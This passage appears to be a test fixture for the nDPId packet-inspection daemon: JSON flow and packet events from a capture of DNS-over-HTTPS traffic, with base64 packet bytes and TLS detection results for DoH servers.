nDAdjBQ71FnqfI6ubmeRFAjPpvyUbaEAnejXwHU9g6Nb1kInR39UeMaOlkv2XbX4eVVedQBnQ80TEebS+RYgvF4z+JaZdzTDBKsiCrr90MrJqELQ15ruqB7RM0T7bzUmBAp55RHbt\/ccY\/TkG\/gVsixMDlDFkIhMYt9MdUi87PoFTfnAamhlvAw7oZO8\/F7iHmtBa\/Ep7E0DP9U5QDAi98hWmChSAXTUreygTLQuqQnUJmosGexWw5Cm8TG3r4N5gnkEVB3HVNF0Bviuw4E\/LgbkZLCP6\/4igcruIsBRgEN00dS6JnGlucNL86jMmrPxWv6fGd6uX4GyIhA8xlh3VmZmkdtEaBCAvedT6MuQU0ug0OS0vhYWi4hpFSwBYkEc7nVVyMbvGRC\/t6cdur00RqtQCHbN+NyMsAYQCMLcN\/MBgJi53gtKoOeVRxL9efr0oSMfPFjg62k6KC1lR+0S5m3Izs0xuBIpZ4qwdqzDBYxqETxd2mAw6qyV9\/+c2vTZTjQfcpnp7y1uBxTcCkKvdXtnytMj88r
6V3CNsrCqoiP+HgdZ35NIzfdjE8dt6Do9yQiQH9DyOtUx8mNKBWoW2GsDQem5ZGAtDwjmFRhkWEqvnuAWeKZRQvsxDNQX1VGCheiYk47AXsweypHM0kF7Sz+NMdgmJ2lYhFlZ1\/ixGlfZSk6mjv0hogoEvvV0z6\/T5ayYUiYrSxxE5CRTBXiQ0ShTnl8JnNrX5f1+PEHiTs9VmgpKgcqyhnAx43FvFz+tjAq2kHUpARsisN76U\/4szTnIzPWHuhFJGJXIYtA6KvZZsRr8X45Bjm7782fphZHssP9T11fz+rMBuNZkB+9kENQs834qUDrDWQYlgtgokMydJHahHIc4rs8RwpnWkwnfbjQyRwpkoSDjqKCsoWgqmckVcAlWtfj+PYNdYUV0GJVz3MaCILZ2I6i8QDOlFT6AvpNPYOGoGbJ0wKc\/iRHcSqwHkLOlqAj9rNOane\/dG8vbDHghfqFdeNPvQAcyGldxWfqiN032Vix7+oZXOFXeLNRXDRdMWbSqMlyCprTcKldxAe+jYGRK\/SRNNln4bS6loI5LqK5kRj1qHOQs4VYAvb6aRZkpJmFfA051r9ZTveZwX8QvPcsUhSp6WJroM5RdVgMoZWRw3V3kLzy526l\/XjarCqs7b9zg4\/0UThyCoRZXRIaapKAxcisr606oQ90EO6V1\/rxbH5QoNdmuIBJXUiCC+vi9DaFQhw7IS7rYl6bCaQkE1gKVqVjcfGFNbkwZ6WVIIFLAd4AULNZ0EbDr3Jxz4Q1Kv61lNl9GOAmC73UocSHTqPhV\/xb9YLlv4Qj8A9VyOXsI3ysVAT7Q3JqQoSzzANJennQVJORrvCGjBFhIJA1XuVUswlY7d8l6GIPFEndkzdJv+mqLebs92Ve7y8gHX+5\/N3bWQDbvROspZd9Rw2VYwhVeRkdNNkB9Zd4yf0MJA6FKQTPIvZ1j4Zvrf8Zqj1FK4+Pu5YWK2VzQ1bAzEZ5TAhqXro79v42FstXXH9Bjh6xGWnYs4EgdjNtrw9q9vDDHzkCgGXErTBS5tZpn4eq4iayRQKOUo2Bjzuikc3GCcT7DGLOzNijLOjpstykBtjYEBagL1lzeuQbGqMxLzwOzMZiM6Cr4dH6Ct7enfPKr1l7EDqLb80TAVFsE6E9zPStbSvvDsesVjI0LnHLpiFF3QD7w\/cMgXGCCQFz4kjOyjxN1ueQ3BiQwzUZI\/KQVjymbQQOaDcU\/hamroqvDR3psu8zkzqDRgXxZpAhYSs0ypnNhUomh4K+raYSufO72xoIxT3MchbmB2xOG+FHTInGWwMp665VQ8P5TZyqYPfZdJpda3UJ4l4i+8AGeTKq9cySdx4swdISz3V3xxrTEFxvjq7CgCc0mdfHRwUrslFZ\/8xz\/GkZ7unKM4nUXsR2wjAWglEejYWAjwBH57asssV4a1smVbgfitfljZxOQxeCULZkhU5iCbDWtt61dkKbIg6Z5Ib6wqsZbKsTNF5BUW\/OluqVhEnnxYi4bC2p8oeMOIg9Xp0ohk+2eyHzNnL7PsT\/0TJd+8z\/6rR4GfsNhau8JwG0sVxaM3gQ\/C1BUi59C0tclt8uqB8v4sL+nw1kYxtxvVF+WgZBhsUG6jtsTkz\/h7Vqr1uE1yqk6VMywMNzSK3C6Y5jNYNZlGRunhyx+Wvqoy4kyzKlb5KJu0D6Ibb9tx4jkjfsAgRv1kb1\/YV+5pR9kOWTI7kTR0GhRhEcYVSuszO6GztHF17jUv1HGqvUE2Y1nYTruioVBGxNU2n\/3D8R0H0Ev+WM\/lE1CkAFwkkBnRPnHTXpqQgZZhPNhQeacIL4PiCwXLGj68pqU9sBR5k+Qs1xeKaXL1uB\/+DlBrxDF37H0xYTjNyCifmppE9xs8wUURoGCYQz8YrJzWYbNTp6iS3VA9PqxHbxpwe+T0EJG3w+ckQ4AZZWQJfpeYEAjUJVTV+JzyForU6vnGB\/f4UtM5hkLlLR2yX4QW
5z2sMH+oemvxHSO3c4dMYOamZjpEAr8HZR\/eYtA\/+k47KLbbuC8LadTWp9kx60hq9j0ZTOjnZRbmpU7x4+baRS3lSZ4uCKQhRDRs1bz+OmCsokrpdBvyRNmpmdHu7+xcAAbWr3GDiMDDj2MeLocIu6VxMJmWwaV6i6S3OZRKsCOQTd0Jkp8jCBeqO4YH7rnKVrcOwj8x\/xgYsXAwMBGfgS0Z5JTGD28Vyg2LfJHOWz9mr0ZY69GFX94xRplNLJ90YhSqkDA41SrPaRCa\/yRHZpmo6Z1mQO81cAsIuYw3\/dzrRByb+dTIlW9yt\/sOP7usPp6PbdD4rTPrbEK4QR\/+wMzHeanap2HaJcY2tnK9Pk6wr3URSABWoCiW8bBJ44gM\/wYSxUIN9fZQXNHmUFX2+4E+pzfHMX+TPSUHrGMWaQGF+jm8f8JzgtBamlKFf0T7ESBzmOVDFYKLq5HkwIpwu7FecWONEwB4QKksZp77Ks7VMI9z7kgYi8fKP1AlrK0wJXYhtL9bgNIor7UcK\/cBVJ2AclPTcIWxPGf\/H2qC2ccHzN2oQA1YRLpy6QS\/qocCCtoi9irrhlFwMDAEUNWvqMs\/h03WKKdBMbYkawhmSS9CnEEwNmSHsUo0aFsC+NuRuOS7d+gyt4adOBPfCXNUuX7r\/jeMTBHE2RkzGNnd\/d06g="} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739374011,"flow_last_seen":946739374036,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":3410,"flow_avg_l4_payload_len":1705,"midstream":1,"thread_ts_msec":946739374036,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":946739374036,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739374036,"pkt":"REREREREZmZmZmZmCABFAAB49DxAAH4GIqIKAAABdMqwGqhiAbtWR3MYNJT\/BlAYAfXmCwAAFAMDAAEBFwMDAEUX9381c\/+R1qgydby2LZz\/D1isDmITv8iB3tIfcLl3X1ZN85j+RzDG7ZR0PP5I0SioKkHY5OtmjMfBNJaLny9tLOB5RTM="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7560000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":946739378281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739378281,"pkt":"REREREREZmZmZmZmCABFAAFK6MRAAH4Gn0EKAAABVQVd5uaSAbv2ZmEwaR3\/oVAYAfZ05AAAFgMBAR0BAAEZAwPCcBaP\/DC8hVoTSokbsQvpjhaLnYrt7eKsiMQ8EXb5AyAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUaWJrc3R1cm0uc3lub2xvZ3kubWUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6FKiZGfISPafy0Na34RI3z\/9T8Zo5Ona0mhcVKXwyTI="} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7560000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":946739378310,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":946739378310,"pkt":"ZmZmZmZmRERERERECABFAACL5iJAADQG7KJVBV3mCgAAAQG75pJpHf+h9mZiUlAYAFOUtgAAFgMDAFgCAABUAwPPIa105ZphEb4djAIeZbiRwqIRFnq7jF4HngniyKgznCAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcRMCAAAMACsAAgMEADMAAgAZFAMDAAEB"} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378281,"flow_last_seen":946739378310,"flow_idle_time":7560000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":946739378310,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":946739378311,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":946739378311,"pkt":"REREREREZmZmZmZmCABFAAAu6MZAAH4GoFsKAAABVQVd5uaSAbv2ZmJSaR4ABFAYAfZzyAAAFAMDAAEB"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":946739378577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739378577,"pkt":"REREREREZmZmZmZmCABFAAFDLylAAH4Gh5EKAAABaBwcIoO8AbvZKqUSoyMYWVAYAfZGMAAAFgMBARYBAAESAwNktN1XF4bqrby0niN\/MgT4p6NPXKBlRwOJCoza94pvXyD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANanAudGlhcmFwLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBNe3CKgugpSU\/ahaeKXUN1ypv0O\/7wv4rJDS1FbyCQKA=="} 
+00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":946739378607,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2557,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2557,"pkt_l4_len":2523,"thread_ts_msec":946739378607,"pkt":"ZmZmZmZmRERERERECABFAAnv8ehAADcGAyZoHBwiCgAAAQG7g7yjIxhZ2SqmLVAYAEJO3AAAFgMDAHoCAAB2AwM5\/Tpf+0rVAVLiqp3AKzeP0oc5LUJ7LbPa16oj3TgNDiD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24xMBAAAuADMAJAAdACC6HV5GLKVmM89uM3s2SIWu43Lfyhq5unw8YJ6WUfrNYwArAAIDBBQDAwABARcDAwk9PLTYD+JT2QAppt0TUbAwAmxAstQCMsQy32ww9oSEEAAMGSMNt+TTdp0V3tZ3ctmeFKC8drVcJHMoKPW\/gLMtyIUmD\/3+eYMhUKtI+3FRz671m\/FiCxQ+DYhEAA2djrJV7bAD8riXyaqFyW2aaJF84flOMuq9DLwOUI0IypM1HnMNVT7vNmCordbJ4vYfoJCHZ3Jdxa1PMxflxUdqb7t2xbf5y\/m1Lgj+QBUEN2VGq3ZK1ktt1GgLlt5OMY6q\/EMncuhg\/OHccuz87CSxEURWL2O5XG3NQ8ZSkyDIF1XtrmR6FGXAhlzN0GIMFD4mIZ5QqyhyGprKsDD36CWqaTOR27WUIRMeWgua2kpjr+elVVRiIT0yfyvShMeR5KvvMj5AG9M4S4\/qWWxJjIv9qLfYm7RWSC4r34hNlFnFlqsqqqzzh\/B
xMvV1bwxfAaqA1qBideWKRVA+7EuN95c4ue7X\/hRVHEx3iQLqTqKG9s8vcXeE42KLZOgVl3B7xu8\/i92\/WkhbHAp1VaoXVrJw6GLiISb\/po8DiOQt5NIdGX5eDQSEZ7O9baKasLWzq1YkwfZijF3n9KVs9qv2KSy5IfvS0SD4T0T96JowaLvO1lvBNbG7CindkMAn7au9+n1sxBnSgPOEhxjP6eP7I9klViNjl15nUFM6o4r0CQuVxRwVYjFh10tMhUtqr5ufjJtftBeIT7Z6ffMsMrzPdyzkIvDM+swGXo7V35YzVo8DyoBYe9uM0JJnrorf04OKftnG+pjuV1J118k\/TcF7dgWMascYwrYulqMRqr3vNGGbqZxylwmKp462M5UtGuo+qerBWSrRXWS6eh\/Pd34MrDX1VmvCOR23Z07RB6KZ9U0a03sYPKhsU\/m8X7Y3lJg3mFbu5qAjYzD1O+cD4Myf40iIoCP9xcs4bu1pUmgjVbsp3ut86GCDAgM+2h3m+dYO91dTNrC6JdnpsdKfoGqobbC1Nd6P0Kznfd6xn\/BQDvXNQHfd3IPzPYj2FRyDUuFDyWgT\/cwlGc7O60WUydzXXvs9ttqI8TuCUJYd1Ao8xx8mAgIvrwtyiwJR5QZQxYq0NnVo97JO1hRxuXJb+LTsywktm+cb6647KFCAIE22xi+EiXjOKZOlKgY\/++l2PKcbQh7+iHITgTYo09PyNcnTJxUwLKCZUcpj08uHLE+si9w6kmA+pKFDGKHD2OQi0\/dVl+2FqCH2+A3DCa2Gg9EWzElOrJ9mp3PsOzxGAh1T1616sYT0her6SVuXlhCGP0slwtRkTfN5tnJIo22tEgWtQ+b6y1PTsvRTouR9DpgUBw8BD3g0lRYqf3KAJIjUNpSvsRMGe0P3S4KCcJTz19EnjfZoP6uX+a1+4rjk2AihvF76LGF5wO7bsnmmIDYTvndhSZUKAm3a49yHTGG7gVwYkqmq0TRbx3kmFRXEBuvlULDIz+RlQyLwuJX5uRyHubvUf803FCAz\/4a9pnE6WEDc+zOoXHErWhAfoc5tjJI1gMxGX8U3yJwrwEtij2gQTn0Bbv4+6DXg8iV1mRetvz2V395BS+h9qVm0PJky45RjI5FxKVNW8VUHbBkrW32Ln2Pm3mojmUt+Xsx7zInkOkVoS97LxHGe13JTpikDPPGgpjpEoHIcQRKqtRb0XznaWZx01cfmn3isfcOxCOvXJUXQwHOBr0ZOeVU8JyV5j86F3c2x16THC9pMZadmbjMRbWkSLTw4DMHNpPKhS6WbcQJhxPZwfAVbKEjktlF0JguUnWmRyDWlD919TvF+XWK\/xSop+ME26vjlWYdWryJvX71XiN34ciEg6jsS9BSYdT6j+C8MLHQApTVrKIlUjg7LizXHOZ\/8TbPIjDL1MmbwanCPsnz+x51R4gaxLum0nLoSL+ZmdQWjq\/uyo2YE03WUuDCwEqP451PgmdaqLRPfWLB1DwCAkXZchOxevuMOjyvWV6dC+e+ksCIkxwJmTgcBQXwfuBwje22m5Cj2nv\/zq4aMsV7kiFOS1VcPYLEbw+c4UolvdLrBBCbMxCQZeGhjAzGdsZDuX\/6sRIGIbuHAE8nIh+KJ0joM4KoZNtLXSA2HqbNN+kRQ5gTFmAp4mqAOgsHxAv6V1xCZg8P3MEffeog7NEB4\/K8wtwtgVyjvZaZ4E5jbN5Fjj\/jqK88SEXhkPYnN+on2bA\/r\/BMBIaoCajkogUyGLoyIPMT+pBrWa+wfZKdLurwPxZw+jCxKJC0\/mmFBL81N3ktV2QA+uWulN8QPCd7cD0\/Hjf2QklIJga5shMEJkHY6px3Tk68O3abNmIreZ6S\/N71agsTVbVTSaRlprW4p5D79LYThW+q2zikyKF2eG4VtVQ1Z087sY8sCBmmZG8ETPN5Xq0TN3Q1mXCkwjS9y4DvkEf4d2VKsFN6yj110+kO
NDzC8lVgKicr46oqIhZ9cyUDwr5+MuFqHiF2KMvJx9XA7v9+a265RIEavlSRTRm3PXbeYNOWUADrJWXjguUacdKmikyCoiD9vRp7ll6YxsV5jSfRT\/9SmZeNE+aTDy2wakB7qY1oeeLE4kVchDyQa22zUAtVHOgOvTZInJYA\/takDFgegJnQaYWISVIejbCOHLLvY\/LGAj1CyqRrh1\/LJm06TJxFQn5cMNb5SSEJFNyxF75PSPT288zWx2Va0aIhDIB+vku9QlaiV4ac8CwDTFNaqbQKECa5ibv22eB002L0jyDWacUoUluFvwofh+CTE377hEPfvjsRjX+V3P\/erPya8F4fW7JQkFJgCrTK1VaoDF64ZvLzNQJ5aCIC3Js6D+sD6g4jOpLHGy2zHMlk9wTN+yBybuSBsrJL9uS5j3JgQRC167kARpn8\/3wkN3\/lvlFPoVYVhj99l\/NeW6y\/YdomeNnyw0D7qas3wz1t0EQFticUf9LLfRMzRHEf20AYOoy9Fonct0XWUb6fLDU7CQJTqCHU8Eiy+rgD2t\/dxE4NlpfZ2ZSbDZ7QWFdftipHKlR4nJqLL0sU6kjZ8SydsZ8oAinHCIV9v5PNYgUBa8WbGYb2kgxJMSN3jbYzsoGwAsbdeAghc0S7LurZvISJXwa0jBqUzUHZmweZXCdDnfDiPc92KCXG9hA13VfXTouQnTd0zyBwPxIcvLGDhAu1CCSmBlGZrOEjmOi1\/i4ug\/A=="} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378577,"flow_last_seen":946739378607,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":1393,"midstream":1,"thread_ts_msec":946739378607,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":946739378610,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739378610,"pkt":"REREREREZmZmZmZmCABFAABoLytAAH4GiGoKAAABaBwcIoO8AbvZKqYtoyMiIFAYAfVFVQAAFAMDAAEBFwMDADUQNuPt6m2nY9MgXiEHZRB5L+gDtuMOMxUUfy82Uox32sOXoFpXHp3NUSfU3Rmr6gABtUijkQ=="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":946739380697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739380697,"pkt":"REREREREZmZmZmZmCABFAAFIsgNAAH4Gh+8KAAABAQAAAdIqAbvH6z5LSWNp6VAYAfbC9wAAFgMBARsBAAEXAwNccnLckexdP3Wz7tsKiknbwUElui2FZGSKODu9LnFkjSDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zLmNsb3VkZmxhcmUuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIM\/CjtFE6\/BfV0qVOcMMUIig11i56\/tpHaQ1FlARye8w"} 
+00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":946739380725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2892,"pkt_l4_len":2858,"thread_ts_msec":946739380725,"pkt":"ZmZmZmZmRERERERECABFAAs+VjZAADoGHccBAAABCgAAAQG70ipJY2npx+s\/a1AYAELM7QAAFgMDAHoCAAB2AwNqFtv3xWSYHbL\/TEVcxTgtPyY5syhT1Ar0J7GcYm2olyDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7BMBAAAuADMAJAAdACABwPRBPqMH6tP2UgTdU38yy4IBdMrNy3Y26n6nkJgoEgArAAIDBBQDAwABARcDAwqMAOf8HgLdG4eR2zQrlVcXNJK6gSgekjnntDDuH\/5mItzTS2PjuRorCZtp1e456Yzxd\/c9Pjo0KqOApsf0Oet3HLAxOPX\/4mq0oqPJv6\/pWYh6XkL49x7kn3sA8FLizWIik5oy6pRjSBWFf6tqxUO+Djt17wQK6yhMls9hUq1ClHJUh6Qn273NZpiWOuHCd9wGeCfeInHvS8qk0EqIdne\/5O3+AKgM\/cALapdKbBhIoAyrPwqC2hLjGuasAzda3QO\/+ESHum\/F9d6o\/5K+8IYpY8o8qtVJ6Drg8futbzGhAS87lZYW5UeuuFH05CzhM6cODq7gNj4mbPjTJ5ApTRpwsXEw0cwu6tAiKdHBHu